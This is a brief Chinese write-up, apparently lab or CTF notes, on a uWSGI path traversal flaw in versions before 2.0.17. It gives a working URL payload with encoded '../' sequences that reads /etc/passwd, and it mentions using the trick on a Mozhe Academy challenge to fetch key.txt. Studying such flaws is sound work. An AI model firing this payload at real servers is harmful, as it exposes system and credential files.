uWSGI是一款Web应用程序服务器，它实现了WSGI、uwsgi和http等协议。 uWSGI 2.0.17之前版本中存在路径遍历漏洞，该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有‘..’序列的特制URL请求利用该漏洞查看系统上的任意文件。

payload：
http://your-ip:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd

比如墨者学院这道题，根目录有key.txt